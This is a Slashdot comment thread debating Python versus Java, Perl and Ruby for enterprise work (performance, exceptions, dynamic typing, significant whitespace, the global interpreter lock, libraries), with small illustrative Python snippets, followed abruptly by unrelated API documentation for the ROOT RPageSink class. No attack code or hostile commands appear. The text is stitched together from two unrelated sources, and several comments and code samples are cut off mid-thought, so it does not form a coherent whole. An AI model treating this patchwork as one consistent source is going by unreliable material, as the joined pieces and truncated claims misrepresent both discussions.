Definition at line 104 of file RPageStorage.hxx.
Definition at line 111 of file RPageStorage.hxx. | https://root.cern.ch/doc/master/classROOT_1_1Experimental_1_1Detail_1_1RPageSink.html | CC-MAIN-2020-24 | refinedweb | 393 | 60.82 |
Computer vision is a domain thats under active research, with applications spreading across a spectrum of fields such as robotics, human computer interaction (HCI), etc. Computer vision involves tasks such as image reception, processing, reasoning, video stream handling, etc. These tasks involve a lot of mathematical processing, which is not easy to implement. To handle this problem and make the life of the developer simpler, frameworks like SimpleCV become handy.
SimpleCV
SimpleCV is an open source framework for performing computer vision tasks. And like its name suggests, it has made computer vision simple. The complexities associated with OpenCV have been taken care of in SimpleCV by providing direct-to-use functions for performing repeatedly used computer vision tasks. SimpleCV is written in Python and can be installed in all major operating systems such as Linux, Windows and Mac. It is available with the BSD licence.
SimpleCV allows developers to handle both images and videos. The source image/video is acquired directly using various input sources as listed below:
- Web cams
- Kinects
- FireWire and IP cameras
- Mobile phone cameras
SimpleCV facilitates not only making changes to the images but also allows them to be understood.
Installation
SimpleCV can be installed on all major operating systems. As it makes the computer vision code simple by providing a wrapper over existing libraries, it has many dependencies. Hence, during installation, all those dependencies need to be taken care of for making SimpleCV ready to run. The process of installation varies in different operating systems. The dependencies for SimpleCV are shown in Figure 1.
If you prefer to install SimpleCV in Ubuntu, use the following commands:
sudo apt-get install ipython python-opencv python-scipy python-numpy python-pygame python-setuptools python-pip sudo pip install
Once the installation has been successfully completed, run simplecv from the console.
For Windows operating systems, there are two different ways of installing SimpleCV. One method is to download the Windows Superpack from . This super pack includes all the dependencies required for SimpleCV installation.
However, if your system already has some of the dependencies and you want to keep them as they are, then individual components can be downloaded separately, as shown below:
1. Download and install Python 2.7 using
2. The Python set-up tools for Windows can be downloaded from
3. Installation of the SciPy super pack can be carried out using
4. Installation of the NumPy super pack can be done by using
5. Installation of Pygame for Windows can be done using
6. Installation and configuration of OpenCV can be done by using
After the downloading has been completed, execute the .exe file and extract to the folder C:\OpenCV2.3\. It can be extracted to any other folder too, but the environment paths are to be set accordingly.
After the installation is over, set the PATH variables accordingly, as shown below:
SETX PATH C:/Python27/;C:/Python27/Scripts/;C:/OpenCV2.3/opencv/build/x86/vc10/bin/;%PATH% SETX PYTHONPATH C:/OpenCV2.3/opencv/build/python/2.7/;%PYTHONPATH%
To update the path variables, it is required that you close the current command prompt and reopen it. Then execute the following commands:
easy_installpyreadline easy_install PIL easy_installcython easy_install pip pip install ipython pip install
After the successful installation by executing the above commands, type simplcv from the command prompt at the installation folder, to open the simplecv shell. Otherwise, you may click on the SimpleCV icon on the desktop.
SimpleCV shell
The SimpleCV shell allows us to execute the commands and get the results in an interactive manner. Some of the shell interaction commands are as listed in Table 1.
The SimpleCV console is shown in Figure 2.
SimpleCV incorporates a detailed and elegant help system. The help on any of the components/libraries can be retrieved by using the Help command. An example of a command and its output is listed below:
SimpleCV:1> help(Image)
The successful response for the above command would be:
Help on class Image in module SimpleCV.ImageClass: class Image | **SUMMARY** | The Image class is the heart of SimpleCV and allows you to convert to and | from a number of source types with ease. It also has intelligent buffer | management, so that modified copies of the Image required for algorithms | such as edge detection, etc can be cached and reused when appropriate. | | Images are converted into 8-bit, 3-channel images in RGB colorspace. It will | automatically handle conversion from other representations into this | standard format. If dimensions are passed, an empty image is created. | | **EXAMPLE** | | >>>i = Image(/path/to/image.png) | >>>i = Camera().getImage() | | You can also just load the SimpleCV logo using: | | >>>img = Image(simplecv) | >>>img = Image(logo) | | Or you can load an image from a URL: | | much more here ...
A detailed tutorial on interactive shells is provided at
SimpleCV HelloWorld
As stated in the beginning of this article, the core idea of SimpleCV is to make machine vision simple. A HelloWorld example is shown below:
from SimpleCV import Camera # Initialize the camera cam = Camera() # Loop to continuously get images while True: # Get Image from camera img = cam.getImage() # Make image black and white img = img.binarize() # Draw the text Hello World on image img.drawText(Hello World OSFY !!!) # Show the image img.show()
As can be observed from the code sample, SimpleCV provides direct functions for performing the vision tasks. The first step is to get the image source from a camera, which can be done using the cam.getImage(). To convert into black and white, the direct function img.binarize() should be used. Similarly, drawing the text also can be carried out using the simple method img.drawText(). The output image can be displayed using img.show().
SimpleCV provides mechanisms to capture the live camera feed using simple methods as shown below:
from SimpleCV import Camera cam = Camera() cam.live()
An example of machine learning
Apart from performing the simple image manipulation tasks as shown in the HelloWorld example, it allows us to perform comparatively advanced tasks such as image classification. The classification is based on the machine learning. A sample code for performing classification is available at the official code repository of SimpleCV (). This example classifies the given image into Nuts and Bolts with Scikits-learn liberary. The image features such as area, height and width are extracted from the imges for the classification purpose:
SimpleCV Blob handling
Blobs are regions of similar pixels. Blobs are used to detect items of interest in the image. Once the blobs are identified, many operations shall be performed as shown in Figure 3.
A simple code for blob handling is as shown below:
from SimpleCV import Image coins = Image(coins.png) binCoins = coins.binarize() blobs = binCoins.findBlobs() blobs.show(width=8)
After binarizing the image, the blobs are identified by directly applying the function .findBlobs(). The example program loads an image with coins in it. The findBlobs is used to identify the pixels representing the coins leaving the background pixels. The screenshot of the input and output images for the blob detection are as shown in Figure 4.
Motion Detection Example
Motion detection is an important task in many machine vision applications. SimpleCV allows the developer to perform the motion detection task using less than ten lines of code as shown below:
from SimpleCV import * cam = Camera() threshold = 5.0 # setting an adjustable threshold for motion detection while True: previous = cam.getImage() #get the current image time.sleep(0.5) #pause for half a second. The 0.5 can be adjusted current = cam.getImage() #get another image diff = current previous # compute the image difference matrix = diff.getNumpy() mean = matrix.mean() diff.show() if mean >= threshold: print Some Movements Detected
As it can be observed from the aforementioned code, the motion detection is carried out by subtracting the current image from the snapshot taken half a second ago. The SimpleCV facilitates direct subtraction of these image shots as shown in the code.
A detailed capability demo of SimpleCV is available at. In Summary, SimpleCV really makes the Vision computing easy by providing a wide collection of methods. As it is Python based, the seamless integration shall be performed with other useful Python Libraries.
Oct. 19, 2016
SimpleCV.org seems to be inactive.
I am not getting any responses from there.
Does anyone know how to get around the error message:
The ‘IPython.config’ package has been deprecated. You should import from traitlets.config instead.
I am running in Windows 10 and downloaded the SimpleCV package from SimpleCV.org.
I appreciate the long posting by K S Kuppusamy, but I still am unable to run/use SimpleCV.
I uninstalled everything related to python and simplecv, etc. and started from scratch as indicated in the posting. I chose to “download the Windows Superpack from . This super pack includes all the dependencies required for SimpleCV installation.” And installed from the downloaded file SimpleCV-1.3.msi
Then I skipped all the steps involved in installing the ” individual components can be downloaded separately, as shown below:”
It is unclear to me whether I should follow these instructions
” Then execute the following commands:
easy_installpyreadline
easy_install PIL
easy_installcython
easy_install pip
pip install ipython
pip install″
I did not do these and I do not see a SimpleCV icon on my desktop. I do see icons for IDLE (Python GUI) and Python (command line) and they work.
BUT I do not understand how to run SimpleCV using either the IDLE or command window.
I don’t understand this statement: “type simplcv from the command prompt at the installation folder, to open the simplecv shell”. What is the “installation folder”?
How do I get a command prompt at the installation folder?
When I type simplecv.exe in the command window, I am told that the ipython package has been deprecated and to use triatlets.config instead.
I have no idea of how to get the simplecv shell by importing from traitlets.config.
Thanks,
Bob
same issue as bob | https://www.opensourceforu.com/2016/05/simplecv-making-vision-computing-easy-and-effective/ | CC-MAIN-2020-45 | refinedweb | 1,662 | 57.16 |
Development/Tasks/Packaging/Policies/Library
From Mandriva Community Wiki
To make upgrades go smoothly, it is important to keep old major versions of libraries on the system, so that programs linked against them still work.
Naming Conventions
Libraries in /usr/lib and /lib must be separately packaged, in a library-only package, named with the name of the main library concatenated with the major of the library (or soname, see below). These packages should not contain any binaries, which should be in a different package. The goal is to be able to install libfoo1 and libfoo2 on the same system.
First of all, it is fundamental that the source rpms keep the same name without any major number, so that the CVS repository contains only one branch for each package.
When the distribution must have two versions of the same library at the same time (for example, qt1 and qt2), the source rpms will be separated so that we can include both versions in the distribution as two different, independently maintained packages.
Here's a generic example of what happens when the library comes with binaries, config files, or anything else that fits neither in the main library package (where only libraries go) nor in the devel package (where headers and development libraries, e.g. .so and .a files, go).
- Source package:
- foo-2.3.4-4mdk.src.rpm
- Binary packages:
- foo-2.3.4-4mdk.arch.rpm
- libfoo2-2.3.4-4mdk.arch.rpm
- libfoo-devel-2.3.4-4mdk.arch.rpm
Naming on x86_64
- Binary packages:
- foo-2.3.4-4mdk.x86_64.rpm
- lib64foo2-2.3.4-4mdk.x86_64.rpm
- lib64foo-devel-2.3.4-4mdk.x86_64.rpm
To handle this complexity, use %mklibname:
%mklibname
The %mklibname macro is used to generate the library package names:
- %mklibname [-d [-s]] name [[api] major]
- -d - generate a name for a devel package
- -s - generate a name for a static package (to be used together with -d)
- name - the library name (note that if the library name is libfoo, you should enter "foo", not "libfoo")
- major - the major number to be appended into the name (this should not be used with -d, except in packages mentioned in special cases below)
- api - if the library has a SONAME like libfoo-1.2.so.4, api should be set to 1.2 and major to 4. This results in libfoo1.2_4.
Example usage:
- %mklibname foo 5 => libfoo5
- %mklibname -d foo => libfoo-devel
- %mklibname -d -s foo => libfoo-static-devel
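To make the naming rules above concrete, here is a small shell sketch that mimics %mklibname's naming logic. This is not the real rpm macro (which is implemented as an rpm macro file), only an illustration of the rules; the function name and argument handling are assumptions for the example.

```shell
# Hypothetical shell re-implementation of %mklibname's naming rules.
mklibname() {
  devel=0; static=0
  # Consume the optional -d / -s flags
  while true; do
    case $1 in
      -d) devel=1; shift ;;
      -s) static=1; shift ;;
      *) break ;;
    esac
  done
  name=$1; api=$2; major=$3
  # With a single trailing argument, it is the major, not the api
  if [ -n "$api" ] && [ -z "$major" ]; then
    major=$api; api=""
  fi
  if [ "$devel" -eq 1 ] && [ "$static" -eq 1 ]; then
    echo "lib${name}-static-devel"
  elif [ "$devel" -eq 1 ]; then
    echo "lib${name}-devel"
  elif [ -n "$api" ]; then
    # SONAME carries an api: libNAME-API.so.MAJOR -> libNAMEAPI_MAJOR
    echo "lib${name}${api}_${major}"
  else
    echo "lib${name}${major}"
  fi
}

mklibname foo 5        # -> libfoo5
mklibname -d foo       # -> libfoo-devel
mklibname -d -s foo    # -> libfoo-static-devel
mklibname foo 1.2 4    # -> libfoo1.2_4
```

The four calls at the bottom reproduce the example usage listed above, plus the libfoo1.2_4 case from the api description.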
*.la files
- if you have *.a files, put *.a and corresponding *.la files in libfoo-static-devel,
- *.la in non standard directories which are used to ltdl/dlopen plugins should go to libfooX (and not libfoo-devel),
- *.la in standard directories can sometimes be used to ltdl/dlopen shared libraries; in that case those *.la should go to libfooX. You must explain in the spec file which programs are doing so, and add a note on the libtool archives page.
- in the other cases, put *.la in libfoo-devel (we could drop them, but the policy is not decided yet)
See the libtool archives page for explanations.
Special cases
We described the default policy for library packages, however some special cases can happen and must be handled using the brain:
- Remember to always check the soname of the libraries (objdump -x libfoo.so.1 | grep SONAME), because some sonames include the library version number, for example libfoo-1.2.so.4. In this case, the package should be named libfoo1.2_4-1.2.4-3mdk.
- Packages ending with a number should be handled by putting a "_" before the major, for example libfoo23_4-1.2-3mdk (in this case the soname would be libfoo23.so.4).
- It is not necessary to split each library in separate packages: if a package contains several libraries, the name would be built from the main library of the package. If there are problems keeping libraries in the same package (e.g. their major may differ), the package should be split.
- When splitting libraries which were previously in a single package, you may need to add Obsoletes/Conflicts "across" the new packages, to hint Urpmi into putting them in the same transaction (ref: libiptc and libiptables splitting)
- If multiple versions of the package are maintained within the distro with different majors, or an expected future release is going to be source-incompatible in a major way (rebuild of concerned pkgs not being enough, and changes required are too big) with the current version (e.g. QT3/QT4/QT5), the devel package name should include the major. In the former case, the devel subpackage of the newest version should generally not contain the major, only the older versions.
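The soname check described in the first two bullets can be sketched in shell. The soname libfoo-1.2.so.4 below is the hypothetical example from the text; in a real package you would read the SONAME with objdump as shown above.

```shell
# Derive the Mandriva-style library package name from a SONAME.
soname="libfoo-1.2.so.4"   # in practice: objdump -x libfoo.so.4 | grep SONAME
base=${soname%.so.*}       # strip the ".so.N" suffix -> libfoo-1.2
major=${soname##*.so.}     # keep only what follows ".so." -> 4
case $base in
  *-*) # soname carries an api version: libNAME-API.so.MAJOR -> libNAMEAPI_MAJOR
       api=${base##*-}
       name=${base%-*}
       pkg="${name}${api}_${major}" ;;
  *)   # plain soname: libNAME.so.MAJOR -> libNAMEMAJOR
       pkg="${base}${major}" ;;
esac
echo "$pkg"                # -> libfoo1.2_4
```

The "_" rule for names ending in a digit (libfoo23_4) would need an extra case, omitted here for brevity.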
Updating a package which is following the old library policy
Change the name of devel packages from %libname-devel to "%mklibname %name -d" (without %major! though usually with %api if present) as seen above, and add an Obsoletes for the previous name ("%mklibname %name 2 -d" or "%{_lib}%{name}2-devel", 2 being the major of the obsoleted devel package). Static-devel packages have to be switched to use %mklibname %name -d -s. If in doubt, do not hesitate to ask on the Cooker mailing list.
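As an illustration only — the package name "foo" and the old major 2 are hypothetical — the converted devel subpackage could look like this:

```
%define libname %mklibname foo 2
%define develname %mklibname foo -d
# Name the devel package had under the old policy, to be obsoleted
%define olddevelname %mklibname foo 2 -d

%package -n %{develname}
Summary: Development files for foo
Group: Development/C
Requires: %{libname} = %{version}
Provides: foo-devel = %{version}-%{release}
Obsoletes: %{olddevelname}
```

The Obsoletes line is what lets urpmi replace the old majored devel package transparently on upgrade.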
Provides and conflicts
At least %name-devel = %version-%release should be provided by the -devel package. If the original tarball name differs from %name, you should also provide tarballname-devel = %version-%release, for compatibility with other RPM-based systems. If multiple versions of the library are maintained within the distro, only the latest shall provide %name-devel; the older versions should provide %name%major-devel or %name%api-devel where applicable. The maintainer may also opt to provide %name%major-devel or %name%api-devel in the newest package as well, if the next major version bump is expected to break source compatibility (see the Special cases above).
It's important to understand that a Provides without version information makes it impossible for later client RPMs to put version information on their dependencies, e.g. "Provides: foo-devel" is NOT enough; please use "Provides: foo-devel = 1.2.4-3mdk".
If multiple versions of the library are maintained within the distro and the exception allowing the use of major in lib -devel package name is used, you have to add conflicts with the other devel package if they are not parallel installable. (this is often the case when the major changed, without renaming the headers).
Adding an old-majored version into the distro
If a package is upgraded to have a new major, and it turns out that it is not source-compatible with the previous release and the users of the library cannot be straightforwardly patched to use the new API, the older library should be maintained in parallel with the new one. The creation process is as follows, using the example package "foo", just upgraded to major 3:
- SVN copy package "foo" from just before the major 3 update to package "foo2". Also change the Name to "foo2" and rename the spec file to foo2.spec.
- Add 2 (the major) to the devel package name, i.e. libfoo2-devel instead of libfoo-devel. This can be achieved by adding the parameter %major into the %mklibname call of %develname.
- Modify any provides so that they have the major number in them. E.g. %name-devel or foo%major-devel is fine.
- Add Conflicts: foo-devel if the package conflicts with the newer devel package.
No changes are needed in the .spec of the newer version.
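As an illustration (hypothetical package "foo"; the macro names follow the policy above, but the exact spec lines are a sketch, not taken from a real package), the relevant changes in foo2.spec might look like:

```spec
# foo2.spec -- sketch of keeping the old major 2 around after foo moved to 3
%define major 2
%define libname %mklibname foo %{major}
# add %major to the devel name so it does not collide with libfoo-devel
%define develname %mklibname foo -d %{major}

Name: foo2

%package -n %{develname}
Provides: foo%{major}-devel = %{version}-%{release}
# only if the headers clash with the newer devel package:
Conflicts: foo-devel
```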
An example
Here's an example of a specfile for a package with no binary and config files, so only library binary packages are needed. (Note that the spec file is not valid; it is only an example that shows how this works and highlights the differences from a normal package.)
%define name gtkmm
%define version 1.2.4
%define rel 1
# api is the part of the library name before the .so
%define api 1.2
# major is the part of the library name after the .so
%define major 1
%define libname %mklibname %{name} %{api} %{major}
%define develname %mklibname %{name} -d

Name: %{name}
#(!) summary for SRPM only
Summary: C++ interface for popular GUI library gtk+
Version: %{version}
Release: %mkrel %rel

%description
#Full and generic description of the whole package. (this will be the SRPM
#description only)

#main package (contains .so.[major].* only)
%package -n %{libname}
#(!) summary for main lib RPM only
Summary: Main library for gtkmm
Group: System/Libraries
Provides: %{name} = %{version}-%{release}

%description -n %{libname}
This package contains the library needed to run programs dynamically linked
with gtkmm.

%package -n %{develname}
Summary: Headers for developing programs that will use Gtk--
Group: Development/GNOME and GTK+
Requires: %{libname} = %{version}
#(!) MANDATORY
Provides: %{name}-devel = %{version}-%{release}

%description -n %{develname}
This package contains the headers that programmers will need to develop
applications which will use Gtk--, the C++ interface to the GTK+
(the Gimp ToolKit) GUI library.

%if %{mdkversion} <= 200900
%post -n %{libname} -p /sbin/ldconfig
%postun -n %{libname} -p /sbin/ldconfig
%endif

%files -n %{libname}
# ..
# include the major number (and api if present) in the file list to catch
# changes on version upgrade
%{_libdir}/lib-%{api}.so.%{major}*

%files -n %{develname}
# ..
%{multiarch_bindir}/gtkmm-config
%{_bindir}/gtkmm-config
%{_includedir}/*.h
%{_libdir}/*.so
More information on the library system in Linux can be found at.
Unit Testing, Agile Development, Architecture, Team System & .NET - By Roy Osherove
1. Make a test that fails
2. Make it work. To show just how easy this is, let’s make a pretend project.
Our first task in the project is to create a class named Calculator that contains a method that adds two numbers. Given what I've just explained, the first step is to have one test that fails. So let's create a new Console Application project. This project will be our testing project, not the real project we have to deliver. It will contain the code that tests our production code.
In our Main() method let's add a few lines of code that determine whether our code (which does not exist yet) runs OK.
The first thing we want to do is test that we can create a new instance of our calculator class:
[STAThread]
static void Main(string[] args)
{
Calculator calc = new Calculator();
}
Now, of course this code won’t compile, but what we have just done is created a test that relies on the fact that a class named Calculator exists. So our next step is now to make the test pass . To do that we’ll finally create our “real” project and add a class named calculator to it. Once we add a reference to that project into out test project, we’ll see that the code compiles and runs just fine. We just made the test pass.
Our next goal? Add an “AddNumbers()” method that takes two numbers and returns the sum of those numbers. Again, what’s the first thing we do? That’s right. We create a test that fails. So let’s add code to test this to our previous test code:
[STAThread]
static void Main(string[] args)
{
//test creation
Calculator calc = new Calculator();
//test addition
int retVal = calc.Add(22,20);
if(42 != retVal)
{
throw new Exception("calc.Add(22,20) did not return a value of 42");
}
}
That was simple. Again, this code won't compile. We have to create the code that does this addition operation. Once we've added a simple method for Add() we can now re-run the test and make sure that it works. Let's make this a little more interesting though. What happens when we send in a null value in one of the parameters? Suppose that the design requires us to throw a CalcException when a null value is sent to this Add() method. If we want to add this feature, we first need to test for it:
//test exception
try
{
    int retVal = calc.Add(null, 22);
}
catch(CalcException ce)
{
    //test passed
}
catch(Exception e)
{
    throw new Exception("calc.Add(null,22) did not throw a CalcException");
}
Now the code won’t compile again, We don’t have a CalcException class defined. Once we define it, we can run the test, but it will fail again, since we’ll get a standard exception and not a calcException from the AddMethod. So we’ll change our code to throw that exception…. And so on…
As you can see this process is pretty easy. What I've done at every step is define a goal, and then make sure I pass it. What we have achieved at the end of this session is a piece of code that is thoroughly tested. Not only that, we get several added bonuses:
· Anyone who looks at our tests can understand what our intention and purpose is for each method
· We can make changes to our code and know “what we broke” with the click of a mouse and fix it just as fast
· If our testing covered all of our code like this, we could find bugs in our programs at build time that would have taken a very long time at the customer’s site
But some things are definitely missing from our current solution:
· No automation. If I wanted to run a build and get the results of the tests that were performed, I'd have a long day coming up with a solution that traces the messages and outputs them.
· No re-use. I’d have to re-write any output handling from scratch every time I want to test a project
· No decoupling. Code that runs a test must be totally decoupled from other code that runs a test. I always want my testing code to run within a given context: a known set of values for parameters and so on. I don't want other tests messing up my state when they change stuff. There's no framework that gives me a separate state for each test without significant work every time.
NUnit
What’s needed here is a framework that allows us to write tests and not worry too much about how we’re going to get back their results. The de-facto framework for .Net unit testing is NUnit. Currently at version 2.1, NUnit provides us with a set of base classes and attributes that allow us to abstract away our unit tests and concentrate on the code that actually does the testing. The beautiful thing is that moving from our current coding/testing style to Nunit style requires little learning and is very easy to master.
NUnit allows us to separate our testing code into what are logically known as tests, test fixtures and test suites. The concept is very simple.
· You write a test to test a single piece of functionality.
· You group one or more tests inside a test fixture that allows you to easily add repeatable state for each test (I’ll explain shortly)
· You group one or more fixtures inside test suites to logically separate the test and their meaning
So how do we turn our code into using Nunit style?
· Download and install Nunit
· Add a reference to the nunit.framework.dll to our testing project
· Add a using clause for the NUnit.Framework namespace in a new class file
Now we’re ready to start working.
Change the class’s name to MyTestingClass .
This class will hold the fixture for our tests. We also need to let the Nunit framework know that this class is a fixture, so we simple add a [TestFixture] attribute on top of the class name. You can remove the default constructor from the class (but don’t make it private!). Once we’ve done that, we have a class that looks like this:
[TestFixture]
public class MyTestClass
{
}

Easy enough. Now we just have to start adding tests to the class. We'll use the code from our previous example to test against Calculator.
A test in a fixture is defined as a public method that returns void and accepts no parameters, marked with the [Test] attribute and with one or more assertions inside. So let's add the first test:
[TestFixture]
public class MyTestClass
{
    [Test]
    public void TestAddition()
    {
        //test addition
        Calculator calc = new Calculator();
        int retVal = calc.Add(22, 22);
        Assert.AreEqual(44, retVal,
            "calc.Add() returned the wrong number");
    }
}
As you can see it’s the same code as before only now it’s sitting in a method of its own .The method is decorated with the [Test] attribute .Also, instead of having to manually throw an exception I’m using the Assert class which is part of the Nunit framework. You’ll get to know this class a lot as this is the main instrument you’ll use to verify your code. The Assert class will fail the current test if the condition passed to it is false. It contains only static methods that allows you to make sure that a value is not null, equals other values and just send in any Boolean expression you like. You can also send in messages that explain the meaning of this failure.
Now we need to build our testing project so we can move on to the next step.
Test suites
Test suites in the new versions of Nunit are derived directly from the namespaces that the test fixtures reside in. If you have two fixtures in separate namespaces (i.e. one is not contained inside the other) they’ll be considered as residing in two separate test suites.
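For example, the test runner would show these two fixtures under two separate suites (the names are illustrative):

```csharp
namespace CalculatorTests
{
    [TestFixture]
    public class AdditionFixture { /* tests... */ }
}

namespace ParserTests   // a sibling namespace => a separate test suite
{
    [TestFixture]
    public class TokenFixture { /* tests... */ }
}
```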
So what now?
GUI
Well, now it’s time to run your first Nunit test. When you install Nunit you get two choices on how to run your unit tests: Either a GUI based version of the Nunit test runner, or a console based one. The Gui one is located in Start->Programs->Nunit V2.1->Nunit-Gui . When you open it you get a pretty “not beautiful” but very functional interface that allows you to select an assembly with compiled unit tests inside it and run all the tests that are there.
· Select File->New project
· Select Project->Add assembly and select your compiled tests assembly.
Once you’ve selected your assembly you’ll see the tree on the left fill up with namespaces, with the names of any test fixtures inside them and the names of any tests inside them. Now you can see why it’s important to put those attributes on our classes and tests. It’s how we make out testing GUI find them and run them.
Make sure the top node of the tree is selected and click "Run" on the right side of the form. You'll see the progress bar very quickly turn green to signify success. If the bar is red, it means that a test has failed and you can go back and make it succeed.
I won’t go into too much detail here on how to use all the features in the Nunit GUI but you can learn all you need by reading the documentation for it.
Feel free to close the GUI, it will remember the last assembly you loaded in it next time.
One important thing to note here is that once one test inside a test suite fails, all other tests will not run.
Console
Besides the GUI version of the NUnit test runner, you also get a console test runner. This is especially good for when you have an automated build procedure that runs unattended. You can make it call the console version of NUnit, which writes directly to standard output, and have it log all results.
To make the console do the testing, you need to switch to [Nunit program files folder]\Bin . From there you can run Nunit-Console.exe providing the name or full path of the assembly to test against. I urge you to put that path inside the global PATH environment variable so that you can use the console easily from anywhere.
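A typical invocation would look something like this (the paths are illustrative; adjust them to your install folder and test assembly):

```bat
cd "C:\Program Files\NUnit V2.1\bin"
nunit-console.exe C:\projects\CalcTests\bin\Debug\CalcTests.dll
```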
More testing goodies we get
· Another attribute you can put on a test is the [Ignore(reason)] attribute. Use this to skip certain tests; the reason for skipping them will be displayed inside the GUI.
· You can have a [SetUp] and [TearDown] method inside your fixture. The [SetUp] runs before each test in the current fixture, and the [TearDown] runs after each test. These methods are very useful when you want all your tests to use the same set of clean, initialized data. In there you can initialize global variables, delete or create needed files and so on. Think of [SetUp] as an implicit constructor for each test, and of [TearDown] as a destructor for it. Methods that are marked by these attributes should not be marked as tests as well!
· You can have [TestFixtureSetUp] and [TestFixtureTearDown] methods as well. These methods will be run only once for each test fixture tested. Use them for global initialization and cleanup of resources that can be shared by all tests in that fixture.
· Another excellent attribute we get is the [ExpectedException] attribute. When a test method is decorated with this attribute and no exception of the type specified in the attribute is thrown inside the test, the test has failed. This is perfect for checking that your components throw exceptions at the right moment, such as on bad user input. We'll use this attribute to add another test to our fixture, which tests for the CalcException:
[Test]
[ExpectedException(typeof(CalcException))]
public void TestException()
{
    Calculator calc = new Calculator();
    calc.Add(null, 22);
}
As you can see it couldn’t be easier.
The Nunit-Addin
Now that you understand the basics of writing unit tests with Nunit, it’s time for me to introduce one of the coolest gadgets related to this subject – the Nunit Addin.
This add-in allows you, instead of re-opening the NUnit GUI every time you need to make sure your tests pass, to just right-click on the project or class you wish to test and hit "Run Test(s)". You'll get all the information inside VS.NET's output window.
This add-in allows more than just this functionality, however. It allows you to test a single method from inside the code editor. Just click anywhere inside the code of that method and hit “Run test”.
Another very powerful feature allows you to do what is called "ad-hoc testing". You can create any method, without even putting a [Test] attribute on it. Then, inside that method, right-click and hit "Test with" - "Debugger" and you immediately step into that method without needing to create a separate project that calls it. Indeed, very powerful. You can also debug using different versions of the .Net framework or even Mono. This add-in is a must-have for quick incremental development.
A word before we finish
The technique I’ve shown here means very little if not pursued diligently. Remember – the first thing you ever do is write the test, not the code. If you keep this up you’ll eventually end up with a system that is fully testable and with fewer bugs. You’ll also find that you think about your component’s design more responsibly, because you’re looking at them from a different perspective. Once you get the “Zen” of it, you’ll start to even have more fun doing it. You’ll also gain confidence in changing your code. You’ll get instant feedback if something broke and you can squash bugs at their inception point.
Another thing that needs to be known: NUnit is the unit testing framework for .Net, but like NUnit there are many others, for practically any semi-popular programming language out there. If you program in C++ for example, take a look at CppUnit. There's also a JUnit out there. In fact, NUnit is a port of JUnit to .Net. There are also commercial frameworks and add-ins that try to provide added functionality for .Net unit testing: some of those include HarnessIt, csUnit and X-Unity.
Most of the non-.Net frameworks support the same kind of logical notions of test case, fixture and suite, but each one might provide different means of expressing them. Attributes are unique to .Net, but in other OO languages you might have to derive a class from TestFixture to declare it as a fixture, and so on. You can find the complete list of frameworks over at (look for the "downloads" link).
Advanced issues
This article is just a first in this series. In the next articles I’ll talk more about real world problems facing a developer who wants to test real-world applications. Some of these issues include:
· Testing abstract classes
· Testing complex object models and dependencies
· Testing database related features
· Mock objects and their use
· Testing GUI interactions | http://weblogs.asp.net/rosherove/articles/28511.aspx | crawl-002 | refinedweb | 2,613 | 71.65 |
30 April 2009 23:15 [Source: ICIS news]
NEW YORK (ICIS news)--Swiss pharmaceutical major Roche is ready to ramp up production of Tamiflu, a company official said on Thursday, as pharmaceutical chemical companies respond to the swine flu outbreak.
Chemical manufacturers associated with Tamiflu, one of only two anti-virals known to be effective against the current flu, could see a demand windfall if nations around the world move to deepen stockpiles of the drugs.
The World Health Organization (WHO) on Wednesday raised its assessment of the outbreak to phase 5, indicating widespread human infection and one level short of declaring a pandemic. As of Thursday, 11 countries had officially reported 257 cases of swine flu – or influenza A (H1N1) – infection, including eight deaths, according to the WHO.
Although many national stockpiles of Tamiflu (oseltamivir) were established after the 2003 avian flu pandemic, fears are mounting that the quantities now available of Tamiflu and another antiviral, GlaxoSmithKline’s Relenza, will not be sufficient.
David Reddy, Roche’s global pandemic preparedness leader, sought to relieve worries.
“Roche’s 3m treatment courses donated to the WHO in 2006 are ready on 24-hour standby to be deployed to areas of need as determined by the WHO,” he said. “We will be working through the night to do all we can to respond in a rapid, timely and responsible manner for patients in need,” he said.
Roche donated 5m treatment courses of Tamiflu in 2006 - a 2m treatment course “regional stockpile” and a 3m treatment course “rapid response” stockpile. The regional stockpiles are held by the WHO at locations around the world.
Roche said that it had fulfilled government orders for a total of 220m Tamiflu treatments.
Roche also said that it had been in contact with WHO since the UN agency’s pandemic alert was elevated.
If the outbreak spreads widely, existing quantities may not be sufficient.
The WHO has previously recommended that governments prepare for pandemics by stockpiling enough treatments for half the population. Most countries are nowhere near that level, although some EU members come close.
India, with a population over 1bn, has a stockpile of just 1m treatments, according to Dow Jones International News. East Asian nations are reportedly better prepared, having been devastated by the avian flu. Many African countries have none.
However, time may be on the side of public health. On Wednesday, a team of researchers at Northwestern University released a computer simulation of the current outbreak that projected a worst-case scenario of only 1,700 cases in the US in four weeks, by which point production could be well under way.
Roche has the capacity to produce 70m additional treatments over six months, a fine chemicals consultant said.
Roche could call on the global network of over 17 fine chemical contractors that the drug company established after the 2003 avian flu pandemic to meet demand for stockpiling Tamiflu. Among the members of this network are Groupe Novasep, Clariant, PHT International, Albemarle and AMPAC Fine Chemicals.
Hyderabad, India-based Hetero Drugs has also been producing a generic version authorised by Roche, which has also authorised Chinese producers Shanghai Pharmaceutical Group and HEC Group to provide pandemic supplies in
Indian drugmakers Cipla and Ranbaxy have been producing generic versions for sale into markets where Tamiflu does not have patent protection. Cipla could produce 1.5m treatments within 4-6 weeks, according to a company official.
I'm on Orcon@Home Unlimited, and I was wondering how I could get a LQD report on my line? Would I have to call Orcon and ask for one? If someone that works at Orcon or anyone could advise how that would be great.
Thanks
FireEngine: So they are produced manually and we aren't going to open a floodgate of just producing them for the sake of it so the real question is....what makes you think you need one? What are we trying to fix here?
solaybro: I tried to get one from Vodafone and they wouldn't do one either. I was really interested in seeing the results, especially after waiting 2 weeks for a reply only to be told they won't do it.
#include <std_disclaimer>
Any comments made are personal opinion and do not reflect directly on the position my current or past employers may have.
---------------------------------------------------------------
Nebukadnessar
Hide-by-Signature Functions in Reference Types
In standard C++, a function in a base class will be hidden by a function with the same name in a derived class, even if the derived class function does not have the same number or type of parameters. This is referred to as hide-by-name semantics. In reference types, a function in a base class can only be hidden by a function in a derived type if the name and parameter list are the same. This is called hide-by-signature semantics.
A class is considered a hide-by-signature class when all its functions are marked in the metadata as hidebysig. By default, all classes created under /clr have hidebysig functions. However, a class compiled with /clr:oldSyntax does not have hidebysig functions; they are hide-by-name functions. When a class has hidebysig functions, the compiler does not hide functions by name in any direct base class. However, once the compiler encounters a hide-by-name class in an inheritance chain, it resumes hide-by-name behavior.
